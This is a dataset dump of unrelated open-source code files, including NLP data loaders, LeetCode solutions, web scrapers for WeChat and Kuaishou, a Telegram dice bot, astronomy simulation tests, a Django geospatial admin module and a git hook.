packages=['devpi_fallback'])\n","repo_name":"msabramo/devpi-fallback","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18819076769","text":"from importlib.resources import path\nimport itertools\nimport json\nimport gzip\nimport numpy\n\nLABELS = {\n 'contradiction': 0,\n 'neutral': 1,\n 'entailment': 2}\n\n\nTYPES = ['train', 'test', 'dev']\n\n\ndef extract_tokens_from_binary_parse(parse):\n return parse.replace('(', ' ').replace(')', ' ').replace('-LRB-', '(').replace('-RRB-', ')').split()\n\n\ndef read_file(filename, skip_no_majority=True):\n with path(__name__, filename) as file, gzip.open(file, 'rt') as lines:\n for line in lines:\n data = json.loads(line)\n label = data['gold_label']\n s1 = ' '.join(extract_tokens_from_binary_parse(data['sentence1_binary_parse']))\n s2 = ' '.join(extract_tokens_from_binary_parse(data['sentence2_binary_parse']))\n if skip_no_majority and label == '-':\n continue\n yield (s1, s2, label)\n\ndef get_data(filename, limit=None):\n lefts, rights, labels = zip(*itertools.islice(read_file(filename), limit))\n from keras.utils import np_utils\n Y = numpy.array([LABELS[l] for l in labels])\n Y = np_utils.to_categorical(Y, len(LABELS))\n return lefts, rights, Y\n\n\ndef get(type):\n return 
get_data('snli_1.0_{}.jsonl.gz'.format(type))\n","repo_name":"Unipisa/DSMs-evaluation","sub_path":"Extrinsic-Evaluation/exeval/snli/data/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"22283721515","text":"#!/usr/bin/env python3\n\n\"\"\"\nThe basic idea is that we iterate through the input array and mark elements\nas negative using nums[nums[i] -1] = -nums[nums[i]-1]. In this way all the\nnumbers that we have seen will be marked as negative. In the second iteration,\nif a value is not marked as negative, it implies we have never seen that index\nbefore, so just add it to the return list.\n\"\"\"\n\n\"\"\"\nThe idea here is to iterate thru the input array and mark:\n\nnums[nums[i] - 1] = -nums[nums[i]-1]\n\ni.e. the VALUE at that index - 1, make it negative\n\nNow nums will be transformed to have negative numbers at indexes in which\nthe value exists. When you iterate a second time, if you see a positive number\nat that index, you can just push i + 1 into the result array\n\nA. Iterate thru array. For each number mark nums[nums[i] - 1] to be negative\nB. Then iterate thru array, if you see a number larger than 0, append whatever\nindex it is at to result array\n\"\"\"\n\n\nfrom typing import List\nimport unittest\n\n\ndef find_all_numbers_not_in_array(alist: List[int]) -> List[int]:\n    res = []\n    if alist is None:\n        return []\n    for n in alist:\n        # mark the value at index abs(n) - 1 as seen by forcing it negative\n        val = abs(n) - 1\n        alist[val] = -abs(alist[val])\n\n    for i, n in enumerate(alist):\n        # a value that stayed positive means index i + 1 never appeared\n        if n > 0:\n            res.append(i + 1)\n\n    return res\n\n\nclass FindAllNumbersTest(unittest.TestCase):\n    def test_find_all_numbers_not_in_array(self):\n        a = [4, 3, 2, 7, 8, 2, 3, 1]\n        res = find_all_numbers_not_in_array(a)\n        self.assertListEqual(res, [5, 6])\n\n\nif __name__ == \"__main__\":\n    unittest.main()\n","repo_name":"aarboleda1/princeton_algos","sub_path":"practice/leetcode/find_all_numbers_in_disappeared_array.py","file_name":"find_all_numbers_in_disappeared_array.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"10790379025","text":"# Time: O(k*r*c + |E|log|V|) = O(k*r*c + (k*|V|)*log|V|)\n#                            = O(k*r*c + (k*(k*2^k))*log(k*2^k))\n#                            = O(k*r*c + (k*(k*2^k))*(logk + k*log2))\n#                            = O(k*r*c + (k*(k*2^k))*k)\n#                            = O(k*r*c + k^3*2^k)\n# Space: O(|V|) = O(k*2^k)\n\nimport collections\nimport heapq\n\n\nclass Solution(object):\n    def shortestPathAllKeys(self, grid):\n        \"\"\"\n        :type grid: List[str]\n        :rtype: int\n        \"\"\"\n        directions = [(0, -1), (0, 1), (-1, 0), (1, 0)]\n\n        def bfs(grid, source, locations):\n            r, c = locations[source]\n            lookup = [[False]*(len(grid[0])) for _ in xrange(len(grid))]\n            lookup[r][c] = True\n            q = collections.deque([(r, c, 0)])\n            dist = {}\n            while q:\n                r, c, d = q.popleft()\n                if source != grid[r][c] != '.':\n                    dist[grid[r][c]] = d\n                    continue\n                for direction in directions:\n                    cr, cc = r+direction[0], c+direction[1]\n                    if not ((0 <= cr < len(grid)) and\n                            (0 <= cc < len(grid[cr]))):\n                        continue\n                    if grid[cr][cc] != '#' and not lookup[cr][cc]:\n                        lookup[cr][cc] = True\n                        q.append((cr, cc, d+1))\n            return dist\n\n        locations = {place: (r, c)\n                     for r, row in enumerate(grid)\n                     for c, place in enumerate(row)\n                     if place not in '.#'}\n        dists = {place: bfs(grid, place, locations) for place in locations}\n\n        # Dijkstra's algorithm\n        min_heap = [(0, '@', 0)]\n        best = collections.defaultdict(lambda: collections.defaultdict(\n            lambda: float(\"inf\")))\n        
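# State encoding (editorial comment): each lowercase key owns one bit of `state`, e.g. state 0b101 means keys 'a' and 'c' are held; heap entries are (distance, place, state), so Dijkstra runs over (place, state) pairs rather than over raw grid cells.\n        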
best['@'][0] = 0\n target_state = 2**sum(place.islower() for place in locations)-1\n while min_heap:\n cur_d, place, state = heapq.heappop(min_heap)\n if best[place][state] < cur_d:\n continue\n if state == target_state:\n return cur_d\n for dest, d in dists[place].iteritems():\n next_state = state\n if dest.islower():\n next_state |= (1 << (ord(dest)-ord('a')))\n elif dest.isupper():\n if not (state & (1 << (ord(dest)-ord('A')))):\n continue\n if cur_d+d < best[dest][next_state]:\n best[dest][next_state] = cur_d+d\n heapq.heappush(min_heap, (cur_d+d, dest, next_state))\n return -1\n\n","repo_name":"kamyu104/LeetCode-Solutions","sub_path":"Python/shortest-path-to-get-all-keys.py","file_name":"shortest-path-to-get-all-keys.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","stars":4314,"dataset":"github-code","pt":"40"} +{"seq_id":"43490895969","text":"import scrapy\nimport sys\nfrom weixin.items import *\nfrom scrapy_splash import SplashRequest\nclass WeixinSpider(scrapy.Spider):\n name='weixin'\n start_urls=[]\n def start_requests(self):\n search_words=[\"广东发布\"]\n for search_word in search_words:\n print(search_word)\n url=\"https://www.sogou.com/web?query=\"+search_word+\"的微信公众号\"\n request=scrapy.Request(url,callback=self.parse,meta={'search_word':search_word})#meta传递额外参数\n yield request\n def parse(self,response):\n url=response.xpath('//div[@class=\"wx-table\"]//div[@class=\"wx-name\"]/span/a/@href').extract_first()\n search_word=response.meta['search_word']\n request=scrapy.Request(url,callback=self.parseList,meta={'search_word':search_word})#meta传递额外参数\n yield request\n\n def parseList(self,response):\n search_word=response.meta['search_word']\n urls=response.xpath('//div[@class=\"weui_media_bd\"]/h4[@class=\"weui_media_title\"]/@hrefs').extract() \n for url in urls:\n url=response.urljoin(url)\n request=scrapy.Request(url,callback=self.parseDetail,meta={'search_word':search_word})#meta传递额外参数\n yield request\n\n def parseDetail(self,response):\n search_word=response.meta['search_word']\n title=response.xpath('//div[@id=\"img-content\"]//h2[@id=\"activity-name\"]/text()').extract_first()\n publish_time=response.xpath('//em[@id=\"publish_time\"]/text()').extract_first()\n js_name=response.xpath('//div[@id=\"meta_content\"]//a[@id=\"js_name\"]/text()').extract_first()\n content=response.xpath('//div[@id=\"js_content\"]').extract_first()\n imgs=response.xpath('//div[@id=\"js_content\"]//img/@data-src').extract()\n \n title=title.replace('\\n','').strip(' ')\n js_name=js_name.replace('\\n','').strip(' ')\n publish_time=publish_time.strip('\\n').strip(' ')\n article=ArticleItem()\n article[\"search_word\"]=search_word\n article[\"title\"]=title\n article[\"js_name\"]=js_name\n article[\"publish_time\"]=publish_time\n article[\"content\"]=content\n article[\"image_urls\"]=imgs\n yield article\n\n \n","repo_name":"blueapplehe/weixinaritcle","sub_path":"weixin/spiders/weixinSpider.py","file_name":"weixinSpider.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"38184252333","text":"# dices\nfrom asyncio import sleep\n\nfrom aiogram import types\n\nimport logging\n\nfrom bot.Banque import Banque\n\nlogging.getLogger(\"psycopg\").setLevel(logging.DEBUG)\n\nbank = Banque()\n\n\nasync def start_cubes(call: types.CallbackQuery):\n keyboard = types.InlineKeyboardMarkup()\n keyboard.add(types.InlineKeyboardButton(text=\"Throw\", 
callback_data=\"throw\"))\n keyboard.add(types.InlineKeyboardButton(text=\" ⬅ Menu ⬅\", callback_data=\"games\"))\n await call.message.edit_text(\"Throw Dices:\", reply_markup=keyboard)\n\n\nasync def throw_dice(call: types.CallbackQuery):\n user_id = call.from_user.id\n\n bank.start_transaction()\n bank.select_cash_for_update(user_id)\n\n cash = bank.show_cash(user_id)\n\n if cash < 300:\n\n keyboard = types.InlineKeyboardMarkup()\n keyboard.add(types.InlineKeyboardButton(text=\" ⬅ Menu ⬅\", callback_data=\"to_menu\"))\n await call.message.edit_text(\"There are not enough shekels on your account. \", reply_markup=keyboard)\n\n else:\n\n keyboard = types.InlineKeyboardMarkup()\n keyboard.add(types.InlineKeyboardButton(text=\" ⬅Menu⬅\", callback_data=\"games\"),\n types.InlineKeyboardButton(text=\"🔄Play Again🔄\", callback_data=\"dices\"))\n\n await call.message.edit_text(\"Throwing Dices:\")\n\n await call.message.answer(\"You:\")\n usr = await call.message.answer_dice()\n\n await call.message.answer(\"Bot:\")\n bott = await call.message.answer_dice()\n\n await sleep(3)\n\n if bott.dice.value > usr.dice.value:\n await call.message.answer(\"You lose;\\n\"\n \"300₪ was deducted from your account\", reply_markup=keyboard)\n\n bank.cash_withdrawal(300, user_id)\n\n elif bott.dice.value < usr.dice.value:\n await call.message.answer(\"You Win;\\n\"\n \"300₪ was credited to your balance\", reply_markup=keyboard)\n bank.replenishment(300, user_id)\n\n elif bott.dice.value == usr.dice.value:\n await call.message.answer(\"Draw\", reply_markup=keyboard)\n bank.commit_transaction()\n","repo_name":"WaldLumen/Geek_Casino","sub_path":"bot/games/dices/dices.py","file_name":"dices.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"37687030041","text":"import unittest, os\nfrom uuid import uuid1\nfrom shutil import rmtree\n\nimport numpy as np\nfrom astropy.io import fits\n\nimport desimodel.io\nimport desispec.io\n\nfrom desisim import io\nfrom desisim import obs\nfrom desisim import pixsim\nimport desisim.scripts.pixsim\n\nfrom desiutil.log import get_logger\nlog = get_logger()\n\ndesi_templates_available = 'DESI_ROOT' in os.environ\ndesi_root_available = 'DESI_ROOT' in os.environ\n\nclass TestPixsim(unittest.TestCase):\n #- Create test subdirectory\n @classmethod\n def setUpClass(cls):\n global desi_templates_available\n cls.testfile = 'test-{uuid}/test-{uuid}.fits'.format(uuid=uuid1())\n cls.testDir = os.path.join(os.environ['HOME'],'desi_test_io')\n cls.origEnv = dict(\n PIXPROD = None,\n DESI_SPECTRO_SIM = None,\n DESI_SPECTRO_DATA = None,\n )\n cls.testEnv = dict(\n PIXPROD = 'test',\n DESI_SPECTRO_SIM = os.path.join(cls.testDir,'spectro','sim'),\n DESI_SPECTRO_DATA = os.path.join(cls.testDir,'spectro','sim', 'test'),\n )\n for e in cls.origEnv:\n if e in os.environ:\n cls.origEnv[e] = os.environ[e]\n os.environ[e] = cls.testEnv[e]\n if desi_templates_available:\n cls.cosmics = (os.environ['DESI_ROOT'] +\n '/spectro/templates/cosmics/v0.2/cosmics-bias-r.fits')\n else:\n cls.cosmics = None\n\n #- to save memory while testing\n cls.ccdshape = (2000,2000)\n\n #- Cleanup test files if they exist\n @classmethod\n def tearDownClass(cls):\n if os.path.exists(cls.testfile):\n os.remove(cls.testfile)\n testpath = os.path.normpath(os.path.dirname(cls.testfile))\n if testpath != '.':\n os.removedirs(testpath)\n for e in cls.origEnv:\n if cls.origEnv[e] is None:\n del os.environ[e]\n else:\n os.environ[e] = 
cls.origEnv[e]\n if os.path.exists(cls.testDir):\n rmtree(cls.testDir)\n\n def setUp(self):\n self.night = '20150105'\n self.expid = 124\n\n def tearDown(self):\n rawfile = desispec.io.findfile('raw', self.night, self.expid)\n if os.path.exists(rawfile):\n os.remove(rawfile)\n fibermap = desispec.io.findfile('fibermap', self.night, self.expid)\n if os.path.exists(fibermap):\n os.remove(fibermap)\n simspecfile = io.findfile('simspec', self.night, self.expid)\n if os.path.exists(simspecfile):\n os.remove(simspecfile)\n for camera in ('b0', 'r0', 'z0'):\n pixfile = desispec.io.findfile('pix', self.night, self.expid, camera=camera)\n if os.path.exists(pixfile):\n os.remove(pixfile)\n simpixfile = io.findfile('simpix', self.night, self.expid, camera=camera)\n if os.path.exists(simpixfile):\n os.remove(simpixfile)\n\n\n @unittest.skipUnless(desi_root_available, '$DESI_ROOT not set')\n def test_pixsim(self):\n night = self.night\n expid = self.expid\n camera = 'r0'\n obs.new_exposure('arc', night=night, expid=expid, nspec=3)\n pixsim.simulate_frame(night, expid, camera, nspec=3,\n wavemin=6000, wavemax=6100, ccdshape=self.ccdshape)\n\n self.assertTrue(os.path.exists(io.findfile('simspec', night, expid)))\n simspec = io.read_simspec(io.findfile('simspec', night, expid))\n self.assertTrue(os.path.exists(io.findfile('simpix', night, expid, camera)))\n self.assertTrue(os.path.exists(io.findfile('pix', night, expid, camera)))\n\n @unittest.skipUnless(desi_templates_available, 'The DESI templates directory ($DESI_ROOT/spectro/templates) was not detected.')\n def test_pixsim_cosmics(self):\n night = self.night\n expid = self.expid\n camera = 'r0'\n obs.new_exposure('arc', night=night, expid=expid, nspec=3)\n pixsim.simulate_frame(night, expid, camera, nspec=3, cosmics=self.cosmics, ccdshape=self.ccdshape)\n\n self.assertTrue(os.path.exists(io.findfile('simspec', night, expid)))\n simspec = io.read_simspec(io.findfile('simspec', night, expid))\n self.assertTrue(os.path.exists(io.findfile('simpix', night, expid, camera)))\n self.assertTrue(os.path.exists(io.findfile('pix', night, expid, camera)))\n\n def test_simulate(self):\n import desispec.image\n night = self.night\n expid = self.expid\n camera = 'r0'\n nspec = 3\n obs.new_exposure('arc', night=night, expid=expid, nspec=nspec)\n simspec = io.read_simspec(io.findfile('simspec', night, expid))\n psf = desimodel.io.load_psf(camera[0])\n psf.npix_y, psf.npix_x = self.ccdshape\n\n image, rawpix, truepix = pixsim.simulate(camera, simspec, psf, nspec=nspec)\n\n self.assertTrue(isinstance(image, desispec.image.Image))\n self.assertTrue(isinstance(rawpix, np.ndarray))\n self.assertTrue(isinstance(truepix, np.ndarray))\n self.assertEqual(image.pix.shape, truepix.shape)\n self.assertEqual(image.pix.shape[0], rawpix.shape[0])\n self.assertLess(image.pix.shape[1], rawpix.shape[1]) #- raw has overscan\n\n #- Travis tests hang when writing coverage when both test_main* were\n #- called, though the tests work on other systems.\n #- Disabling multiprocessing also \"fixed\" this for unknown reasons.\n @unittest.skipIf(False, 'Skip test that is causing coverage tests to hang.')\n def test_main_defaults(self):\n night = self.night\n expid = self.expid\n camera = 'r0'\n nspec = 3\n ncpu = 3\n obs.new_exposure('arc', night=night, expid=expid, nspec=nspec)\n\n #- run pixsim\n opts = ['--night', night, '--expid', expid, '--nspec', nspec]\n if ncpu is not None:\n opts.extend( ['--ncpu', ncpu] )\n \n log.debug('testing pixsim.main({})'.format(opts))\n 
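#- invoke the pixsim command-line entry point with the options built above\n        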
desisim.scripts.pixsim.main(opts)\n\n #- verify outputs\n simpixfile = io.findfile('simpix', night, expid)\n self.assertTrue(os.path.exists(simpixfile))\n rawfile = desispec.io.findfile('raw', night, expid)\n self.assertTrue(os.path.exists(rawfile))\n fx = fits.open(rawfile)\n\n self.assertTrue('B0' in fx)\n self.assertTrue('R0' in fx)\n self.assertTrue('Z0' in fx)\n fx.close()\n\n #- cleanup as we go\n os.remove(simpixfile)\n os.remove(rawfile)\n\n @unittest.skipIf(False, 'Skip test that is causing coverage tests to hang.')\n def test_main_override(self):\n night = self.night\n expid = self.expid\n camera = 'r0'\n nspec = 3\n ncpu = 3\n obs.new_exposure('arc', night=night, expid=expid, nspec=nspec)\n\n #- derive night from simspec input while overriding expid\n simspecfile = io.findfile('simspec', night, expid)\n altrawfile = desispec.io.findfile('raw', night, expid) + '.blat'\n opts = [\n '--simspec', simspecfile,\n '--expid', expid+1,\n '--rawfile', altrawfile,\n '--cameras', 'b0,r0',\n '--preproc',\n '--wavemin', 5000, '--wavemax', 7000.0,\n '--ccd_npix_x', 2000,\n ]\n if ncpu is not None:\n opts.extend( ['--ncpu', ncpu] )\n\n log.debug('testing pixsim.main({})'.format(opts))\n desisim.scripts.pixsim.main(opts)\n simpixfile = io.findfile('simpix', night, expid+1)\n self.assertTrue(os.path.exists(simpixfile))\n self.assertTrue(os.path.exists(altrawfile))\n fx = fits.open(altrawfile)\n self.assertTrue('B0' in fx)\n self.assertTrue('R0' in fx)\n self.assertTrue('Z0' not in fx)\n fx.close()\n\n #- cleanup as we go\n os.remove(simpixfile)\n os.remove(altrawfile)\n\n def test_project(self):\n psf = desimodel.io.load_psf('z')\n wave = np.arange(8000, 8010)\n phot = np.ones((2, len(wave)))\n specmin = 12\n args = psf, wave, phot, specmin\n xyrange, pix = pixsim._project(args)\n\n with self.assertRaises(ValueError):\n phot = np.ones((2,3,4))\n args = psf, wave, phot, specmin\n os.environ['UNITTEST_SILENT'] = 'TRUE'\n xyrange, pix = pixsim._project(args)\n del os.environ['UNITTEST_SILENT']\n\n def test_parse(self):\n night = self.night\n expid = self.expid\n opts = ['--psf', 'blat.fits', '--night', night, '--expid', expid]\n opts += ['--spectrographs', '0,3']\n args = desisim.scripts.pixsim.parse(opts)\n self.assertEqual(args.psf, 'blat.fits')\n self.assertEqual(args.night, night)\n self.assertEqual(args.expid, expid)\n self.assertEqual(args.spectrographs, [0,3])\n self.assertEqual(args.cameras, ['b0', 'b3', 'r0', 'r3', 'z0', 'z3'])\n\n with self.assertRaises(ValueError):\n desisim.scripts.pixsim.parse([])\n\n def test_expand_args(self):\n night = self.night\n expid = self.expid\n\n opts = ['--night', night, '--expid', expid, '--spectrographs', '0']\n args = desisim.scripts.pixsim.parse(opts)\n self.assertEqual(args.rawfile, desispec.io.findfile('raw', night, expid))\n self.assertEqual(args.cameras, ['b0','r0','z0'])\n\n opts = ['--night', night, '--expid', expid, '--spectrographs', '0,1',\n '--arms', 'b,z']\n args = desisim.scripts.pixsim.parse(opts)\n self.assertEqual(args.cameras, ['b0', 'b1', 'z0', 'z1'])\n\n opts = ['--cameras', 'b0', '--night', night, '--expid', expid]\n args = desisim.scripts.pixsim.parse(opts)\n self.assertEqual(args.cameras, ['b0'])\n\n opts = ['--cameras', 'b0,r1', '--night', night, '--expid', expid]\n args = desisim.scripts.pixsim.parse(opts)\n self.assertEqual(args.cameras, ['b0','r1'])\n\n#- This runs all test* functions in any TestCase class in this file\nif __name__ == '__main__':\n unittest.main()\n\ndef test_suite():\n \"\"\"Allows testing of only this module 
with the command::\n\n        python setup.py test -m \n    \"\"\"\n    return unittest.defaultTestLoader.loadTestsFromName(__name__)\n","repo_name":"michaelJwilson/LBGCMB","sub_path":"desihub/desisim/py/desisim/test/test_pixsim.py","file_name":"test_pixsim.py","file_ext":"py","file_size_in_byte":10249,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"}
+{"seq_id":"455329238","text":"# -*- coding: utf-8 -*-\n# Function that computes the mean\ndef mean(x):\n    return sum(x) / len(x)\n\n# Function that computes the median\ndef median(x):\n    n = len(x)\n    x.sort()\n    mid = n // 2\n    if n % 2 == 1:\n        return x[mid]\n    else:\n        low = mid - 1\n        high = mid\n        return (x[low] + x[high]) / 2\n","repo_name":"parksanghun/python_study","sub_path":"week_2/mod1.py","file_name":"mod1.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"33819288794","text":"import json\n\nfrom django import forms\nfrom django.contrib.gis import admin\nfrom django.contrib.gis.geos import GEOSGeometry, Polygon\nfrom django.core.exceptions import RequestAborted, ValidationError\nfrom django.core.validators import FileExtensionValidator\n\nfrom .models import (\n    LandClass,\n    LandClassification,\n    MiscTile,\n    Project,\n    ProjectAlgo,\n    Scene,\n    SegmentationEntry,\n    SuperPixel,\n    SuperPixelAlgo,\n)\nfrom .utils import check_geojson, check_raster, handle_tiles_upload\n\nadmin.site.register(Project)\nadmin.site.register(SuperPixelAlgo)\nadmin.site.register(ProjectAlgo)\nadmin.site.register(SuperPixel)\nadmin.site.register(LandClassification)\nadmin.site.register(SegmentationEntry)\n\n\n# =====================================================================================================================\n# Land class\n# =====================================================================================================================\nclass LandClassFormAdmin(forms.ModelForm):\n    color = forms.CharField(label=\"Class color\", max_length=7, widget=forms.TextInput(attrs={\"type\": \"color\"}))\n\n\n@admin.register(LandClass)\nclass LandClassAdmin(admin.ModelAdmin):\n    fields = [\"name\", \"description\", \"color\"]\n    form = LandClassFormAdmin\n\n\n# =====================================================================================================================\n# Processing Scene with base tiles\n# =====================================================================================================================\nclass MiscTileInline(admin.TabularInline):\n    model = MiscTile\n    fields = [\"name\", \"description\", \"uuid\", \"tiles_path\", \"bbox\"]\n    readonly_fields = [\"uuid\", \"tiles_path\", \"bbox\"]\n\n\nclass SceneFormAdmin(forms.ModelForm):\n    json_file = forms.FileField(\n        label=\"GeoJSON with superpixel polygons\",\n        required=False,\n        validators=[FileExtensionValidator([\"json\", \"geojson\"])],\n    )\n    algo_id = forms.ModelChoiceField(queryset=SuperPixelAlgo.objects.all(), required=False)\n    image_file = forms.FileField(label=\"Spatial Raster Image\", required=False)\n\n    def clean(self):\n        cleaned_data = super().clean()\n        # Check raster\n        im_file = cleaned_data[\"image_file\"]\n        # Check if it could be processed with gdal2tiles\n        if \"image_file\" in self.changed_data:\n            check_raster(im_file)\n        # Check json if needed\n        if not cleaned_data.get(\"json_file\") is None:\n            json_file = cleaned_data[\"json_file\"]\n            scene = self.instance\n            scene_bbox = None\n            if scene.bbox is not None:\n                scene_bbox = scene.bbox\n            check_geojson(json_file, scene_bbox, 
im_file)\n return cleaned_data\n\n def clean_algo_id(self):\n algo_id = self.cleaned_data[\"algo_id\"]\n if self.instance.pk is None: # Check if it is a new Scene object\n if algo_id is None:\n raise ValidationError(\"To create a new entry, please specify an algorythm\")\n # Algo id should be present if new SuperPixels provided\n if \"json_file\" in self.changed_data:\n if algo_id is None:\n raise ValidationError(\"Please specify an algorythm\")\n return self.cleaned_data[\"algo_id\"]\n\n def clean_image_file(self):\n # We want the user to provide image file on Scene creation. On the Scene change, the field is optional\n im_file = self.cleaned_data[\"image_file\"]\n if self.instance.pk is None: # Check if it is a new Scene object\n if im_file is None:\n raise ValidationError(\"To create a new entry, please provide the raster file\")\n return self.cleaned_data[\"image_file\"]\n\n def clean_json_file(self):\n # We need to check that the file is geojson, polygon, and could be read with GEOSGeometry\n im_file = self.cleaned_data[\"json_file\"]\n if self.instance.pk is None: # Check if it is a new Scene object\n if im_file is None:\n raise ValidationError(\"To create a new entry, please provide the json file\")\n return self.cleaned_data[\"json_file\"]\n\n class Meta:\n model = Scene\n fields = []\n\n\n@admin.register(Scene)\nclass SceneAdmin(admin.ModelAdmin):\n fields = [\"proj_id\", \"name\", \"description\", \"image_file\", \"json_file\", \"algo_id\", \"uuid\", \"tiles_path\", \"bbox\"]\n readonly_fields = [\"uuid\", \"tiles_path\", \"bbox\"]\n inlines = [MiscTileInline]\n form = SceneFormAdmin\n\n def save_model(self, request, obj, form, change):\n if not form.is_valid():\n # If something wrong, just let super method to handle that\n super().save_model(request, obj, form, change)\n\n # process image ===============================================================================================\n # Here we want to process image only if it is in changed form data (pass if a new file was not provided)\n if \"image_file\" in form.changed_data:\n # Generate uuid field if not present\n if obj.uuid is None:\n obj.gen_uuid()\n scene_uuid = obj.uuid\n else:\n scene_uuid = obj.uuid\n # Process image\n output_dir, bbox, srid, err = handle_tiles_upload(request.FILES[\"image_file\"], scene_uuid)\n # Check output for errors\n if err is not None:\n # Can not figure out how to handle this (form.add_error does not prevent for model saving)\n raise RequestAborted(err)\n\n obj.tiles_path = output_dir\n # Add bounding box to model obj, control for srid\n poly = Polygon.from_bbox(bbox)\n poly.srid = srid\n # Reproject bbox polygon to Scene model srid\n poly.transform(Scene.bbox.field.srid)\n obj.bbox = poly\n self.message_user(request, f\"Tiles for {obj} have been processed and saved to {output_dir}\")\n\n # Check if Superpixel Geojoson need to be processed\n if (not form.cleaned_data[\"json_file\"] is None) and (\"json_file\" in form.changed_data):\n # First check if our object has pk (or it is new, if so save current)\n if obj.pk is None:\n obj.save()\n change = True # So the super().save_model will treat subsequent additions as changes\n else: # The case of update (delete existent polys only if algo_id is the same)\n SuperPixel.objects.filter(scene_id=obj).filter(algo_id=form.cleaned_data.get(\"algo_id\")).delete()\n\n # Read geojson file (do not know why, but I was able to read it only via chunks)\n json_str = \"\"\n for chunk in request.FILES[\"json_file\"].chunks():\n json_str += 
chunk.decode(\"utf-8\")\n geojson_data = json.loads(json_str)\n\n # Loop over features and save them\n for feature in geojson_data.get(\"features\", []):\n feature_str = feature.get(\"geometry\")\n feature_str.update({\"crs\": geojson_data.get(\"crs\")})\n tmp_geom = GEOSGeometry(json.dumps(feature_str))\n tmp_geom.transform(obj.bbox.srid)\n # Save to SuperPixel model\n new_sp_obj = SuperPixel(scene_id=obj, algo_id=form.cleaned_data[\"algo_id\"], sp=tmp_geom)\n new_sp_obj.save()\n # Call super save\n super().save_model(request, obj, form, change)\n\n\n# =====================================================================================================================\n# Processing MiscTile model\n# =====================================================================================================================\nclass MiscTileFormAdmin(SceneFormAdmin):\n def clean_json_file(self):\n return None\n\n def clean_algo_id(self):\n return None\n\n class Meta:\n model = MiscTile\n fields = []\n\n\n@admin.register(MiscTile)\nclass MiscTileAdmin(SceneAdmin):\n fields = [\"scene_id\", \"name\", \"description\", \"image_file\", \"uuid\", \"tiles_path\", \"bbox\"]\n readonly_fields = [\"uuid\", \"tiles_path\", \"bbox\"]\n exclude = [\"json_file\", \"algo_id\"]\n inlines = []\n form = MiscTileFormAdmin\n","repo_name":"ivanstrel/django_spmc","sub_path":"django_spmc/spmc/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":8222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39718176415","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2022/4/17 20:23\n# @Author : shixin.liu\n# @File : intro_spider.py\nimport json\n\nfrom spiders.kwai.extractors.user_info_extractor import IntroUserInfoExtractor\nfrom spiders.kwai.tag_spider import KwaiTagSpider\n\n\nclass KwaiIntroSpider(KwaiTagSpider):\n def __init__(self):\n super().__init__()\n self.api = \"http://wxmini-api.uyouqu.com/rest/wd/wechatApp/search/user?__NS_sig3=6d7d390a8b450f5c9c303332b1f9f1d2aa541b482c2c2e2e21202339&__NS_sig3_origin=3sCt3iAAAAAAAAAAAAAAAwEQBv2b8ewCRWoKUiAAAABa1Uck2OzFjuwHqPh2n/qSj9QknvaoDgEN0sVDnubK8Q==\"\n self.user_extractor = IntroUserInfoExtractor()\n self.tag_list = [\n '短剧'\n ]\n\n def extract_user_list(self, rsp):\n data_json = json.loads(rsp.content)\n self.user_extractor.process(\n [video.get('user_id') for video in data_json.get('users')])\n\n\nif __name__ == '__main__':\n KwaiIntroSpider().extract()\n","repo_name":"yidatecSpider/crawl_user_info","sub_path":"spiders/kwai/intro_spider.py","file_name":"intro_spider.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"43796665577","text":"#!/usr/bin/env python\nfrom setuptools import setup\nimport os\n\n\n# Utility function to read README file\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\n\nsetup(name='django-logical-rules',\n version='2.0',\n description='A rule engine for Django apps.',\n author='Benjamin Stookey',\n author_email='it@aashe.org',\n url='https://github.com/AASHE/django-logical-rules',\n license='LICENSE',\n long_description=read(\"README.rst\"),\n packages=[\n 'logical_rules',\n 'logical_rules.templatetags',\n 'logical_rules.tests',\n 'logical_rules.tests.test_app',\n ],\n install_requires=[\n \"Django >= 1.9\",\n ],\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Web Environment',\n 'Framework :: 
Django',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Topic :: Utilities'\n ],\n )\n","repo_name":"AASHE/django-logical-rules","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23666150168","text":"#!/usr/bin/env python\n\nimport os, sys\n\nimport importlib\nimportlib.reload(sys)\n\ndef run_hook(callback, old, new, ref):\n\tif old == \"0000000000000000000000000000000000000000\":\n\t\tsys.exit(0)\n\tret = os.system(\"git rev-parse -q --verify %s^2 >/dev/null\" % new)\n\tif ret == 0:\n\t\tmerge = True\n\telse:\n\t\tmerge = False\n\n\tsock = os.popen(\"git rev-list %s..%s\" % (old, new))\n\thashes = sock.readlines()\n\tsock.close()\n\thashes.reverse()\n\n\tfor i in hashes:\n\t\t# the second parameter is true, if this is a commit of a\n\t\t# merge (ie. if it's true, then the sendmail script\n\t\t# won't send it out, so that only the merge commit is\n\t\t# mailed after a merge)\n\t\tlast = i == 